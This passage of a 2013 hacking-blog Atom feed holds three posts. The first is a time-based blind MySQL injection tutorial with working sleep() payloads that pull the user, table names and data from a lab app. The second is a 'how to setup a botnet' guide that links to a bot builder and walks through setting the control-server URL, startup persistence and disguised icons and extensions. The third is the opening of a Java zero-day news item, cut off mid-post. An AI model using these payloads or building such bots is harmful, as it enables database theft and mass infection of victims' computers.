/><thr:total>0</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerabilities-fixed-by.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0UAQns_eCp7ImA9WhBRFUs.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4414845610786175504</id><published>2013-03-06T02:20:00.003-08:00</published><updated>2013-03-06T02:20:43.540-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-06T02:20:43.540-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection" /><title>MySQL Injection Time Based</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;a href="http://3.bp.blogspot.com/-Pc_svnUIZhI/USJpoZHt2PI/AAAAAAAACmw/IbCcBiXiKNo/s1600/sqlinjection+(1).jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="154" src="http://3.bp.blogspot.com/-Pc_svnUIZhI/USJpoZHt2PI/AAAAAAAACmw/IbCcBiXiKNo/s320/sqlinjection+(1).jpg" width="320" /&gt;&lt;/a&gt;We have already written a couple of posts on SQL Injection techniques, Such as "&lt;a href="http://www.rafayhackingarticles.net/2013/02/sql-injection-basics-union-based.html" target="_blank"&gt;SQL Injection Union Based&lt;/a&gt;", "&lt;a href="http://www.rafayhackingarticles.net/2013/02/blind-sql-injection-detection-and.html" target="_blank"&gt;Blind SQL Injection&lt;/a&gt;" and last but not least &lt;b&gt;"&lt;a href="http://www.rafayhackingarticles.net/2013/02/solutions-related-to-sql-injection.html" target="_blank"&gt;Common problems faced while performing SQL Injection&lt;/a&gt;", &lt;/b&gt;However how could the series miss the "&lt;b&gt;Time based SQL injection"&lt;/b&gt; technqiues, @yappare has came with another excellent post, which explains how this attack can be used to perfrom wide variety of attacks, over to&amp;nbsp;@yappare.&lt;br /&gt;
&lt;br /&gt;
Hey everyone! Its another post by me again, @yappare. Today as I promised to our Mr Rafay previously that i would write a tutorial for RHA on MySQL Time based technique, here's a simple tutorial on MySQL Time Based SQLi, Before that, as usual here are some good references for those interested in SQLi&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
http://technet.microsoft.com/en-us/library/cc512676.aspx&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;/div&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
and of course the greatest cheatsheet, http://pentestmonkey.net/category/cheat-sheet&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
OK back to our testing machine. In this example,I'll use OWASP WebApps Vulnerable machine.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Tested on Peruggia application.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Lets gO!&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Previously, we already knew that in this parameter, pic_id is vulnerable to SQLi. So,let say we want to use Time Based Attack to this vulnerable parameter,here what we are going to do.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://1.bp.blogspot.com/-InCWjnswhHI/UTazR5jtJOI/AAAAAAAAAYY/MEwS2vwU1Ss/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="318" src="http://1.bp.blogspot.com/-InCWjnswhHI/UTazR5jtJOI/AAAAAAAAAYY/MEwS2vwU1Ss/s640/1.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
But first,do note that in MySQL, for Time Based SQLi, we are going to use SLEEP() function.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
each DBMS have different type of function to use,but the steps usually quite similar.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
In MSSQL we use WAITFOR DELAY&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
In POSTGRES we use PG_DELAY()&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
and so on..do check it on pentestmonkey cheatsheet :D&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Back to our testing. So lets try to check either Time Based Attack can be done on the parameter or not.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Test it using this command&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and sleep(5)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-xQ310OdKpfE/UTazRAxBmfI/AAAAAAAAAYQ/oOBnlLPPInY/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="496" src="http://4.bp.blogspot.com/-xQ310OdKpfE/UTazRAxBmfI/AAAAAAAAAYQ/oOBnlLPPInY/s640/2.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
As we can see from the image above, there's a different between the requests. The 1st one is a normal request where the response time is 0 sec. While the 2nd request I include the SLEEP() command for 5 seconds before the server response. So from here we know that its can be attack via Time Based as well.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;Lets proceed to check the current user.&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Here's the command the we are going to use&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if(substring(user(),1,1)='a',SLEEP(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;a href="http://4.bp.blogspot.com/-70KPJOhOAqE/UTazRQQl8SI/AAAAAAAAAYM/JPQscOLjV3M/s1600/3.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"&gt;&lt;img border="0" height="577" src="http://4.bp.blogspot.com/-70KPJOhOAqE/UTazRQQl8SI/AAAAAAAAAYM/JPQscOLjV3M/s640/3.png" width="601" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Where from the query, if the current user's 1st word is equal to 'a', the server will sleep for 5 seconds before responding. If not,the server will response at its normal response time.Then you should proceed to test with other characters.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
From the image above,clearly we can see that the 1st and 2nd request, the server responded at 0 second. While the 3rd request,the server delayed for 5 seconds. Why?&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Because the 1st character of the current user start with 'p'.. not 'a' or 'h'&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Then you can proceed to check for its 2nd character and so on.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if(substring(user(),2,1)='a',SLEEP(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if(substring(user(),3,1)='a',SLEEP(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;so on..&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;So go on with table_name guessing.&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;i&gt;&lt;b&gt;pic_id=13 and IF(SUBSTRING((select 1 from [guess_your_table_name] limit 0,1),1,1)=1,SLEEP(5),1)&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-MqHmGEmhX_8/UTazSIp78pI/AAAAAAAAAYk/HK23MX_nMks/s1600/4.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="499" src="http://3.bp.blogspot.com/-MqHmGEmhX_8/UTazSIp78pI/AAAAAAAAAYk/HK23MX_nMks/s640/4.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The 1st request is FALSE,because the server response is 0 second.There's no table_name=user exist then.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
While the 2nd request,the server delayed for 5 seconds,so a table_name=users do exist!&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;How about guessing the column_name?Its easy.&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and IF(SUBSTRING((select substring(concat(1,[guess_your_column_name]),1,1) from [existing_table_name] limit 0,1),1,1)=1,SLEEP(5),1)&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-xPFn4uZgdTU/UTazSUQS5UI/AAAAAAAAAY4/-uSuR_pWg-M/s1600/5.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="499" src="http://4.bp.blogspot.com/-xPFn4uZgdTU/UTazSUQS5UI/AAAAAAAAAY4/-uSuR_pWg-M/s640/5.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
See the image above?Still need any explanation? I bet you guys already understand it! :D&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;u&gt;Get the data mode!&lt;/u&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;b&gt;&lt;i&gt;pic_id=13 and if((select mid(column_name,1,1) from table_name limit 0,1)='a',sleep(5),1)--&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
So,if the 1st character of data at the right column_name in the right table_name = 'a', the server will delayed for 5 seconds.&amp;nbsp;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
And then proceed to test the 2nd,3rd char and so on..&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-pZ8QUX-rbio/UTazS0McuSI/AAAAAAAAAY0/7nJXOpRhPBY/s1600/6.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="348" src="http://4.bp.blogspot.com/-pZ8QUX-rbio/UTazS0McuSI/AAAAAAAAAY0/7nJXOpRhPBY/s640/6.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
The image shown that the username=admin..so is it correct?lets double check it&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-tsa38cZ7yIQ/UTazS76nc_I/AAAAAAAAAYw/2WJmntX29lg/s1600/7.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="166" src="http://2.bp.blogspot.com/-tsa38cZ7yIQ/UTazS76nc_I/AAAAAAAAAYw/2WJmntX29lg/s400/7.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Yeahhh.its correct.&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
That's all for now!&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Thanks,&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
@yappare&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=NXreh1y6Rdc:4-rRSOfqsIc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=NXreh1y6Rdc:4-rRSOfqsIc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/NXreh1y6Rdc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4414845610786175504/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4414845610786175504?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4414845610786175504?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/NXreh1y6Rdc/mysql-injection-time-based.html" title="MySQL Injection Time Based" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-Pc_svnUIZhI/USJpoZHt2PI/AAAAAAAACmw/IbCcBiXiKNo/s72-c/sqlinjection+(1).jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/mysql-injection-time-based.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4CQnk7eCp7ImA9WhBQEUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9061278541844143594</id><published>2013-03-04T14:10:00.000-08:00</published><updated>2013-03-13T10:49:23.700-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-13T10:49:23.700-07:00</app:edited><title>How Hackers Make Botnets To Infect Systems [Part 2]</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/286wpvq.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://oi48.tinypic.com/286wpvq.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span id="goog_1986115820"&gt;&lt;/span&gt;&lt;span id="goog_1986115821"&gt;&lt;/span&gt;&lt;br /&gt;
Hello RHA readers, we are back with How To Setup A Botnet [Tutorial For Noobs] [Part 2]. Those who haven't read previous part than check the first part in order to understand part two, as it is the sequel of How to setup a Botnet.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs.html" target="_blank"&gt;Part 1: How To Setup A Botnet [Tutorial For Noobs] [Part 1]&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;So in this part we will teach you how to setup a Botnet.&lt;br /&gt;
&lt;h4&gt;
Step 1:&lt;/h4&gt;
Now after hosting the server, Extract Bot builder in you computer.&lt;br /&gt;
Download it from here http://www.mediafire.com/?hb9ou6g50a620nb &lt;br /&gt;
&lt;h4&gt;
Step 2:&lt;/h4&gt;
After extracting, you'll a application for BOT Building with 'VNBuilder' name.&lt;br /&gt;
Run the application.&lt;br /&gt;
It would be like as shown in image:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/1538f3q.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="267" src="http://oi48.tinypic.com/1538f3q.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&amp;nbsp;step 3:&lt;/h4&gt;
Check the box in the below.&lt;br /&gt;
&lt;h4&gt;
Step 4:&lt;/h4&gt;
Now go in the 'Web Setting' Tab. Type the website where you have set 
your server in ROOT WEBSITE URL column. Remember your website url should
 be like www.yourwebsite.com this, No Http:// in starting. Leave the 
port number as it is. Now type the folder in which your server is set, 
And it should be like /folder name/. leave All other thing as it is. As 
it is shown in image: &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi49.tinypic.com/2e51s1y.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="261" src="http://oi49.tinypic.com/2e51s1y.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h4&gt;
&amp;nbsp;Step 5:&lt;/h4&gt;
Now Go to Load settings tab, check the 'INSTALL LOADER TO START UP' option. Like in the image:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi48.tinypic.com/14wv9k9.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="264" src="http://oi48.tinypic.com/14wv9k9.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;
Step 6:&lt;/h4&gt;
Proceed to last Tab BUILD LOADER, Now if you want to change icon of your virus than go to top right of under build loader tab, You can add icons their for your virus, additional icons are given with builder. You can even change the extention from .exe to .bat and few others, In the bottom of window you can find option to change extension. Now In the last click Build. &lt;br /&gt;
Builder will ask where to save with which name, provide your desire one. &lt;br /&gt;
&lt;h4&gt;
Step 7:&lt;/h4&gt;
You've successfully created Bot. Now in order to check whether the bot 
is working or not RUN it in you Computer, Turn your antivirus It'll 
detect the virus. After running virus, go and login in the server you 
made in part one of this tutorial. If your virus is created Successfully
 than you IP will be appearing in the server list with your computer 
name. Like mine:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://oi45.tinypic.com/1231non.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://oi45.tinypic.com/1231non.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
If your Ip appearing, than you have configured Botnet successfully. Congratulations.&lt;br /&gt;
Thanks for reading, Stay tuned with us for more tutorials!&lt;br /&gt;
&lt;br /&gt;
&lt;h4&gt;
About The Author&lt;/h4&gt;
&lt;br /&gt;
This article has been written by Fahad awan, Who has recently joined RHA's team, We wish him best of luck and hope that he enjoys working for RHA.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=3KaTZlVAWbY:qBnQX4Njqgs:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=3KaTZlVAWbY:qBnQX4Njqgs:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/3KaTZlVAWbY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9061278541844143594/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs_4.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9061278541844143594?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9061278541844143594?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/3KaTZlVAWbY/how-to-setup-botnet-tutorial-for-noobs_4.html" title="How Hackers Make Botnets To Infect Systems [Part 2]" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-to-setup-botnet-tutorial-for-noobs_4.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAESHo_eSp7ImA9WhBRE0U.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-944568494266277642</id><published>2013-03-04T00:06:00.000-08:00</published><updated>2013-03-04T01:18:29.441-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-04T01:18:29.441-08:00</app:edited><title>Another Java Zero-Day Vulnerability Spotted In The Wild</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-xeEZW5thXC8/UTRUfCwYDdI/AAAAAAAAA_w/XDA-LwYoC2o/s1600/Java_Bullet.jpg" imageanchor="1"&gt;&lt;img border="0" height="378" src="http://3.bp.blogspot.com/-xeEZW5thXC8/UTRUfCwYDdI/AAAAAAAAA_w/XDA-LwYoC2o/s320/Java_Bullet.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
So, you thought you were out of the woods with Java? Bad news. You aren't. Another Java zero-day vulnerability has been found in the wild by &lt;b&gt;FireEye&lt;/b&gt;.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Java v1.6 and Java v1.7 Update 15 on browsers are being targeted this time around. The previously unknown and unpatched vulnerability exploits browsers to install a remote-access trojan named McRat.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
